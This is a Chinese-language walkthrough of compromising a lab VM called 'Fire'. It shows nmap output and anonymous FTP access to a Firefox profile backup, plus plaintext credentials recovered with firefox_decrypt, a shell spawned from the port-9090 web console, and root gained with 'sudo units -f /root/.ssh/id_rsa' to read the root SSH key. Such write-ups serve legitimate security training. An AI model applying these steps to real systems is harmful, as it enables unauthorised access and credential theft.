# 靶场搭建
下载:Fire
Nat,IP: 192.168.1.133
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
21/tcp open ftp pyftpdlib 1.5.7 | |
| ftp-syst: | |
| STAT: | |
| FTP server status: | |
| Connected to: 192.168.1.133:21 | |
| Waiting for username. | |
| TYPE: ASCII; STRUcture: File; MODE: Stream | |
| Data connection closed. | |
|_End of status. | |
| ftp-anon: Anonymous FTP login allowed (FTP code 230) | |
|_-rw-r--r-- 1 root root 4442576 Sep 29 2023 backup.zip | |
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | |
| ssh-hostkey: | |
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA) | |
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA) | |
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519) | |
80/tcp open http Apache httpd 2.4.56 ((Debian)) | |
|_http-server-header: Apache/2.4.56 (Debian) | |
|_http-title: Apache2 Debian Default Page: It works | |
9090/tcp open ssl/zeus-admin? | |
| fingerprint-strings: | |
| GetRequest, HTTPOptions: | |
| HTTP/1.1 400 Bad request | |
| Content-Type: text/html; charset=utf8 | |
| Transfer-Encoding: chunked | |
| X-DNS-Prefetch-Control: off | |
| Referrer-Policy: no-referrer | |
| X-Content-Type-Options: nosniff | |
| Cross-Origin-Resource-Policy: same-origin | |
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <title> | |
| request | |
| </title> | |
| <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> | |
| <meta name="viewport" content="width=device-width, initial-scale=1.0"> | |
| <style> | |
| body { | |
| margin: 0; | |
| font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif; | |
| font-size: 12px; | |
| line-height: 1.66666667; | |
| color: #333333; | |
| background-color: #f5f5f5; | |
| border: 0; | |
| vertical-align: middle; | |
| font-weight: 300; | |
|_ margin: 0 0 10p | |
|_ssl-date: TLS randomness does not represent time | |
| ssl-cert: Subject: commonName=teste/organizationName=b8029c6b7a9c4c7d93fed3a3c6ab94bc | |
| Subject Alternative Name: IP Address:127.0.0.1, DNS:localhost | |
| Not valid before: 2023-09-29T17:19:10 | |
|_Not valid after: 2024-09-28T17:19:10 |
看到 ftp,马上匿名登录进去,得到一个备份
发现 mozilla/firefox ,有 firefox,搜索一下发现是 firefox 的备份文件?
下载一个解密程序:firefox_decrypt
┌──(root㉿kali)-[~/Desktop/firefox_decrypt-main] | |
└─# ./firefox_decrypt.py ../../mozilla/firefox | |
Select the Mozilla profile you wish to decrypt | |
1 -> 3m1uu7kd.default | |
2 -> pe1jatah.default-esr | |
2 | |
Website: http://localhost | |
Username: 'marco' | |
Password: 'm@rc0!123' |
得到一组账号密码,9090 能登陆的
登录进去发现有个 terminal 功能,直接弹 shell 出来
# 提权
sudo -l 发现 units 这个命令有 sudo 权限,help 看了一下发现能读取文件
sudo units -f /root/.ssh/id_rsa 拿到密钥
弄下来处理一下保存起来,可以 root 登陆了
